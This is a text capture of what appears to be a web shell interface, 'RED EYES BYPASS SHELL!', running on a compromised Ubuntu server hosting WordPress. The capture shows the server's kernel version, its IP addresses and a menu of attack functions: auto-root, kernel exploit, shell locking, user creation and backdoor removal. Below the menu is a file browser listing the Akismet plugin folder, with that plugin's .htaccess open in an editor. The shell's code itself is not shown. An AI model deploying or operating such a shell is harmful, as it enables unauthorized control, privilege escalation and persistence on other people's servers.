Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
sdgs /
wp-content /
plugins /
akismet /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
_inc
[ DIR ]
drwxr-xr-x
views
[ DIR ]
drwxr-xr-x
.htaccess
772
B
-rwxr-xr-x
LICENSE.txt
17.67
KB
-rwxr-xr-x
akismet.php
2.57
KB
-rwxr-xr-x
changelog.txt
21.45
KB
-rwxr-xr-x
class.akismet-admin.php
54.42
KB
-rwxr-xr-x
class.akismet-cli.php
4.66
KB
-rwxr-xr-x
class.akismet-rest-api.php
17.32
KB
-rwxr-xr-x
class.akismet-widget.php
3.07
KB
-rwxr-xr-x
class.akismet.php
71.84
KB
-rwxr-xr-x
index.php
26
B
-rwxr-xr-x
readme.txt
5.64
KB
-rwxr-xr-x
wrapper.php
6.29
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : .htaccess
# Only allow direct access to specific Web-available files. # Apache 2.2 <IfModule !mod_authz_core.c> Order Deny,Allow Deny from all </IfModule> # Apache 2.4 <IfModule mod_authz_core.c> Require all denied </IfModule> # Akismet CSS and JS <FilesMatch "^(form\.js|akismet(-frontend|-admin)?\.js|akismet(-admin)?(-rtl)?\.css|inter\.css)$"> <IfModule !mod_authz_core.c> Allow from all </IfModule> <IfModule mod_authz_core.c> Require all granted </IfModule> </FilesMatch> # Akismet images <FilesMatch "^(logo-(a|full)-2x\.png|akismet-refresh-logo\.svg|akismet-refresh-logo@2x\.png|arrow-left\.svg|icon-external\.svg)$"> <IfModule !mod_authz_core.c> Allow from all </IfModule> <IfModule mod_authz_core.c> Require all granted </IfModule> </FilesMatch>
Close